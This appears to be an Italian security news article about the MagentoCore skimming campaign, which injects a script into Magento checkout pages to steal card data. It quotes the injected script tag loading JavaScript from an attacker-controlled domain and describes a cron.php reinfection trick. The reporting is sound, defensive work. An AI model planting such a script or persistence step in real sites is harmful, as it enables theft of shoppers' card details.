Lo Skimmer MagentoCore ha già infettato 7.339 negozi online Magento ed secondo Willem de Groot, esperto di sicurezza, è il più aggressivo fino ad oggi. Alcuni hacker informatici hanno creato uno script “skimmer” in grado di prendere i dati delle carte di credito degli acquirenti di uno shop online.
Secondo de Groot, dietro questa campagna di hacking c’è la volontà di compromettere gli shop online, accedendo al pannello di admin di Magento.
In questo momento, è possibile verificare su PublicWWW che ancora 5078 siti sono purtroppo affetti da questo attacco.
Come fa MageCore a rubare i dati delle carte di credito?
Lo script MageCore è inserito nelle pagine del sito legate al pagamento e in questo modo è in grado di accedere a tutti i dati delle carte di credito, fornite dai clienti in fase di acquisto. A questo punto, le informazioni, vengono inviate ad un server controllato dall’hacker. De Groot ha infatti detto che questo attacco, parte da un script skimmer caricato dal dominio magecore.net, da cui appunto prende il nome.
L’esperto di sicurezza di Groot, ha rilevato questo script su 7.339 negozi negli ultimi 6 mesi. Una cifra piuttosto rilevante, se pensiamo che poi la campagna di hacking è purtroppo ancora in corso e sta compromettendo molti siti realizzati in Magento. Si conta che il ritmo di contagia sia di 50-60 nuovi store online al giorno.
Anche se molti degli amministratori dei siti compromessi sono riusciti ad individuare lo script incriminato e ad eliminarlo, molti altri (circa 1450) non sono riusciti ancora a farlo.
Quando un sito è stato compromesso, gli hacker aggiungono il seguente codicer javascript al modello HTML del sito. Il codice in questione è il seguente:
<script type= “text/javascript” src= “hxxps://magentocore.net/mage/mage.js” ></script>
Lo script malevolo registra quanto digitato dalle vittime sulla tastiera al momento dell’acquisto online. Queste informazioni, vengono poi inviare ad un server, “magentocore.net”. Non solo… questo codice malevolo, consente un meccanismo di backup aggiungendo al cron.php un’istruzione per il download periodico delle codice stesso.
Chi è stato colpito da MagentoCore?
“L’elenco delle vittime di questa nuova campagna include aziende quotate in borsa dal valore di diversi milioni di dollari, circostanza che suggerisce che i profitti della campagna siano tutt’altro che modesti.” , ha aggiunto de Groot.
“Ma le vere vittime sono i clienti dei siti, coloro ai quali gli attaccanti hanno rubato i dati e l’identità”.